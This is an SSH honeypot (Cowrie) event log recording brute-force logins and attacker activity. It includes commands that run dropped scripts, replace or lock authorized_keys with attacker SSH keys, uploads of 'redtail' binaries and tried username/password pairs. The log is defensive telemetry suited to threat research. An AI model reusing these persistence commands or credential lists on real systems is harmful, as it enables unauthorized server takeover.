{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54818,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a46a543a4db","protocol":"ssh","message":"New connection: 212.227.235.229:54818 (1.2.3.4:22) [session: 5a46a543a4db]","sensor":"my-vps","timestamp":"2025-09-08T22:59:20.811733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:59:20.812677Z","src_ip":"212.227.235.229","session":"5a46a543a4db"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:59:21.021900Z","src_ip":"212.227.235.229","session":"5a46a543a4db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:59:21.609605Z","src_ip":"212.227.125.160","session":"e40ca210806e"}
{"eventid":"cowrie.command.input","input":"chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","message":"CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","sensor":"my-vps","timestamp":"2025-09-08T22:59:21.610301Z","src_ip":"212.227.125.160","session":"e40ca210806e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","size":80,"shasum":"4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:21.654614Z","src_ip":"212.227.125.160","session":"e40ca210806e"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-09-08T22:59:21.698136Z","src_ip":"212.227.125.160","session":"e40ca210806e"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-09-08T22:59:21.700285Z","src_ip":"212.227.125.160","session":"e40ca210806e"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-09-08T22:59:21.702533Z","src_ip":"212.227.125.160","session":"e40ca210806e"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-09-08T22:59:21.705323Z","src_ip":"212.227.125.160","session":"e40ca210806e"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-09-08T22:59:21.708063Z","src_ip":"212.227.125.160","session":"e40ca210806e"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-09-08T22:59:21.709203Z","src_ip":"212.227.125.160","session":"e40ca210806e"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:21.754532Z","src_ip":"212.227.125.160","session":"e40ca210806e"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer456","message":"login attempt [root/Qwer456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:59:21.896278Z","src_ip":"212.227.235.229","session":"5a46a543a4db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:59:22.327807Z","src_ip":"212.227.235.229","session":"5a46a543a4db"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:59:22.328513Z","src_ip":"212.227.235.229","session":"5a46a543a4db"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:59:22.329451Z","src_ip":"212.227.235.229","session":"5a46a543a4db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:22.384443Z","src_ip":"176.65.149.186","session":"a17c2f9eb9b1"}
{"eventid":"cowrie.session.closed","duration":180.12669801712036,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:22.389482Z","src_ip":"176.65.149.186","session":"a17c2f9eb9b1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:22.539336Z","src_ip":"212.227.235.229","session":"5a46a543a4db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:59:23.066906Z","src_ip":"212.227.235.229","session":"5a46a543a4db"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:59:23.067612Z","src_ip":"212.227.235.229","session":"5a46a543a4db"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:59:23.278073Z","src_ip":"212.227.235.229","session":"5a46a543a4db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:23.279024Z","src_ip":"212.227.235.229","session":"5a46a543a4db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51210,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f97d76e9d2e","protocol":"ssh","message":"New connection: 212.227.235.229:51210 (1.2.3.4:22) [session: 1f97d76e9d2e]","sensor":"my-vps","timestamp":"2025-09-08T22:59:23.499092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:59:23.499977Z","src_ip":"212.227.235.229","session":"1f97d76e9d2e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:59:23.715098Z","src_ip":"212.227.235.229","session":"1f97d76e9d2e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:59:24.619877Z","src_ip":"212.227.235.229","session":"1f97d76e9d2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52318,"dst_ip":"1.2.3.4","dst_port":22,"session":"47cc937a1850","protocol":"ssh","message":"New connection: 212.227.235.229:52318 (1.2.3.4:22) [session: 47cc937a1850]","sensor":"my-vps","timestamp":"2025-09-08T22:59:25.527547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:59:25.528221Z","src_ip":"212.227.235.229","session":"47cc937a1850"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:59:25.628945Z","src_ip":"212.227.235.229","session":"47cc937a1850"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:25.837092Z","src_ip":"212.227.235.229","session":"1f97d76e9d2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51226,"dst_ip":"1.2.3.4","dst_port":22,"session":"2192f4da6ea5","protocol":"ssh","message":"New connection: 212.227.235.229:51226 (1.2.3.4:22) [session: 2192f4da6ea5]","sensor":"my-vps","timestamp":"2025-09-08T22:59:26.038843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:59:26.040516Z","src_ip":"212.227.235.229","session":"2192f4da6ea5"}
{"eventid":"cowrie.login.failed","username":"webapp","password":"111111","message":"login attempt [webapp/111111] failed","sensor":"my-vps","timestamp":"2025-09-08T22:59:26.067528Z","src_ip":"212.227.235.229","session":"47cc937a1850"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36282,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f2551010258","protocol":"ssh","message":"New connection: 212.227.235.229:36282 (1.2.3.4:22) [session: 1f2551010258]","sensor":"my-vps","timestamp":"2025-09-08T22:59:26.179575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:59:26.180245Z","src_ip":"212.227.235.229","session":"1f2551010258"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:59:26.250546Z","src_ip":"212.227.235.229","session":"2192f4da6ea5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:59:26.319149Z","src_ip":"212.227.235.229","session":"1f2551010258"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37570,"dst_ip":"1.2.3.4","dst_port":22,"session":"da6a5cd8aef2","protocol":"ssh","message":"New connection: 212.227.235.229:37570 (1.2.3.4:22) [session: da6a5cd8aef2]","sensor":"my-vps","timestamp":"2025-09-08T22:59:26.504573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:59:26.506622Z","src_ip":"212.227.235.229","session":"da6a5cd8aef2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:59:26.738837Z","src_ip":"212.227.235.229","session":"da6a5cd8aef2"}
{"eventid":"cowrie.login.failed","username":"test","password":"0000","message":"login attempt [test/0000] failed","sensor":"my-vps","timestamp":"2025-09-08T22:59:26.922063Z","src_ip":"212.227.235.229","session":"1f2551010258"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:59:27.129913Z","src_ip":"212.227.235.229","session":"2192f4da6ea5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:27.170569Z","src_ip":"212.227.235.229","session":"47cc937a1850"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:27.341090Z","src_ip":"212.227.235.229","session":"2192f4da6ea5"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:27.341951Z","src_ip":"212.227.235.229","session":"5a46a543a4db"}
{"eventid":"cowrie.login.failed","username":"es","password":"qwerty","message":"login attempt [es/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T22:59:27.711272Z","src_ip":"212.227.235.229","session":"da6a5cd8aef2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:28.066011Z","src_ip":"212.227.235.229","session":"1f2551010258"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:29.503365Z","src_ip":"212.227.235.229","session":"da6a5cd8aef2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40758,"dst_ip":"1.2.3.4","dst_port":22,"session":"559bac5aff41","protocol":"ssh","message":"New connection: 212.227.235.229:40758 (1.2.3.4:22) [session: 559bac5aff41]","sensor":"my-vps","timestamp":"2025-09-08T22:59:42.431479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:59:42.432416Z","src_ip":"212.227.235.229","session":"559bac5aff41"}
